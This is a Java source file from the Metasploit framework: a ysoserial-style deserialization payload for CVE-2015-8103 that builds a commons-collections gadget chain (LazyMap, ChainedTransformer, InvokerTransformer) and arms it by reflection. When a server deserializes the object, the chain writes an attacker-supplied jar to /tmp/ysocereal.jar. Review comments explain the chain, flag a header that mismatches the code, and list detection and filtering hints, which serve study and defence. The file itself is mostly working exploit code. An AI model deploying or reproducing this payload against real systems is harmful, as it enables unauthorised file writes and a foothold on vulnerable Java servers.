GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/CommonsCollections3.java
package ysoserial.payloads;
import java.io.File;
import java.io.FileInputStream;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.io.FileUtils;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
    Gadget chain (as listed by the author):
        ObjectInputStream.readObject()
            AnnotationInvocationHandler.readObject()
                Map(Proxy).entrySet()
                    AnnotationInvocationHandler.invoke()
                        LazyMap.get()
                            ChainedTransformer.transform()
                                ConstantTransformer.transform()
                                InvokerTransformer.transform()
                                    Method.invoke()
                                        Class.getMethod()
                                InvokerTransformer.transform()
                                    Method.invoke()
                                        Runtime.getRuntime()
                                InvokerTransformer.transform()
                                    Method.invoke()
                                        Runtime.exec()

    NOTE(review): the Runtime.getRuntime() / Runtime.exec() entries above do not match
    the transformers built in getObject() below. That array holds two InvokerTransformer
    steps: the first resolves FileUtils.writeByteArrayToFile(File, byte[]) through
    Class.getMethod(), the second calls Method.invoke() on it. The effect when the chain
    runs is therefore a file write, not a process launch.

    Requires:
        commons-collections

    NOTE(review): the chain also references org.apache.commons.io.FileUtils, so commons-io
    presumably has to be loadable by the JVM that deserializes the object -- confirm.
 */
/**
 * ysoserial payload that returns an {@link InvocationHandler} wrapping a proxied
 * commons-collections {@code LazyMap} whose factory is a {@code ChainedTransformer}.
 *
 * <p>The transformer chain installed at the end of {@link #getObject(String)} writes a
 * byte array, read from {@code /tmp/pwned.jar} when the payload is built, to
 * {@code /tmp/ysocereal.jar} via {@code FileUtils.writeByteArrayToFile}.
 *
 * <p>For detection and hardening: a stream carrying this graph names
 * {@code org.apache.commons.collections.functors.InvokerTransformer},
 * {@code ChainedTransformer}, {@code ConstantTransformer} and
 * {@code org.apache.commons.collections.map.LazyMap}. A deserialization filter
 * (for example {@code java.io.ObjectInputFilter}) that rejects those classes stops the
 * chain before any transformer runs. The on-host artifact of a successful run is the
 * file {@code /tmp/ysocereal.jar} created by the process that deserialized the stream.
 */
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<InvocationHandler> {

    /**
     * Builds the object graph for this payload.
     *
     * @param command not read anywhere in this method; source and destination paths are
     *                hard-coded. Presumably kept only to satisfy the {@code ObjectPayload}
     *                signature -- the interface is not visible here.
     * @return the handler produced by {@code Gadgets.createMemoizedInvocationHandler}
     *         around the proxied map
     * @throws Exception declared broadly; among other causes, reading
     *                   {@code /tmp/pwned.jar} fails if that file is absent or unreadable
     *                   on the machine building the payload
     */
    public InvocationHandler getObject(final String command) throws Exception {
        // Destination path. It travels inside the serialized graph, so the write lands on
        // whichever host runs the transformer chain.
        final File f = new File("/tmp/ysocereal.jar");
        // Read eagerly, at build time, on the machine generating the payload; the whole
        // byte array is embedded in the object graph.
        final byte[] bFile = FileUtils.readFileToByteArray(new File("/tmp/pwned.jar"));

        // inert chain for setup: a single ConstantTransformer(1) placeholder. Presumably
        // this keeps map accesses made while the proxy and handler are constructed below
        // from running the real chain locally.
        final Transformer transformerChain = new ChainedTransformer(
            new Transformer[]{ new ConstantTransformer(1) });
        // real chain for after setup. Each transformer's output is the next one's input:
        //   1. ConstantTransformer      -> FileUtils.class
        //   2. InvokerTransformer       -> FileUtils.class.getMethod("writeByteArrayToFile",
        //                                  File.class, byte[].class)
        //   3. InvokerTransformer       -> that Method's invoke(null, f, bFile); the null
        //                                  receiver means a static call
        //   4. ConstantTransformer      -> 1, the value finally handed back to the map
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(FileUtils.class),
                new InvokerTransformer("getMethod", new Class[] {
                    String.class, Class[].class }, new Object[] {
                    "writeByteArrayToFile", new Class[]{File.class, byte[].class} }),
                new InvokerTransformer("invoke", new Class[] {
                    Object.class, Object[].class }, new Object[] {
                    null, new Object[]{f,bFile} }),
                new ConstantTransformer(1) };

        final Map innerMap = new HashMap();

        // LazyMap calls its factory (the chain) on get() for a missing key, per the gadget
        // chain listed in the header comment.
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        // Gadgets helpers are defined elsewhere; by their names and the header comment they
        // wrap the map in an AnnotationInvocationHandler-backed proxy -- confirm in Gadgets.
        final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

        final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

        // Must stay last: only after the handler exists is the placeholder array replaced
        // with the real one, by setting the "iTransformers" field of the ChainedTransformer.
        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

        return handler;
    }

    /**
     * Command-line entry point; hands this class and the arguments to
     * {@code PayloadRunner.run}. What the runner does with them is not visible here.
     *
     * @param args forwarded unchanged to {@code PayloadRunner.run}
     * @throws Exception whatever {@code PayloadRunner.run} propagates
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections3.class, args);
    }
}